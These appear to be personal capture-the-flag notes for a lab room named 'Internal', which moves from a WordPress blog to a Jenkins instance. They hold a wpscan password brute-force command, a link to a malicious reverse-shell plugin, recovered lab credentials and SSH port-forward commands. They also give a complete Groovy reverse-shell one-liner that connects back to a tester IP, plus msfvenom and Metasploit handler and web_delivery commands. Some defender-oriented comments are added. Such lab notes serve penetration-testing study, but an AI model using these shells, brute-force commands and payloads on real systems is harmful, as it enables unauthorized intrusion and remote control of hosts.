Internal
Only ports 22 and 80 are open. Enumeration reveals a WordPress blog.
private post
set up a port forward and brute force the Jenkins login
// find only admin user
// brute force wp-admin
//
wpscan --url=http://internal.thm/blog --passwords /home/kali/htb/rockyou.txt
// find password
// log in to wp-admin with the recovered creds and install a malicious plugin (rev shell)
https://github.com/wetw0rk/malicious-wordpress-plugin
ssh -L 8000:172.17.0.1:8080 user@10.10.221.230 -fN
Will's credentials. william:arnold147
aubreanna:bubb13guM!@#123
// code for groovy script / rev shell
// https://blog.pentesteracademy.com/abusing-jenkins-groovy-script-console-to-get-shell-98b951fa64a6
// Groovy snippet run from the Jenkins script console (see the linked article above).
// It starts a local bash process and relays that process's stdout/stderr to a TCP
// socket, and the socket's input back to the process's stdin.
// Defender view: on the Jenkins host this appears as the Jenkins JVM spawning bash
// together with an outbound TCP connection to host:port. Process-lineage monitoring
// and egress filtering both surface it, and script-console access depends on the
// Jenkins login itself, so lockout/rate limiting and strong admin passwords matter.
String host="10.9.47.64";  // address the socket connects to (presumably the tester's VPN-side IP in this lab)
int port=5555;  // TCP port the socket connects to
// The single statement line below: launch bash with stderr merged into stdout, open
// the socket, then loop while the socket is open, copying any available bytes in each
// direction, flushing, and sleeping 50 ms per pass. p.exitValue() throws while the
// process is still running (exception swallowed); once it returns, the loop breaks and
// the process and socket are cleaned up.
String cmd="bash";Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
// random notes
172.16.20.0/24
python3 -c 'import pty; pty.spawn("/bin/bash")'
msf> use auxiliary/server/socks_proxy
set SRVPORT 1080
msfvenom -p linux/x64/shell/reverse_tcp LHOST=10.9.47.64 LPORT=4448 -f elf-so -o shell-x64
use multi/handler
set LPORT 4449
portfwd add -R -L 10.9.47.64 -l 4444 -p 4445
use exploit/multi/script/web_delivery
set target PHP
set payload payload/php/meterpreter_reverse_tcp
set LHOST tun0
sessions 1
meterpreter>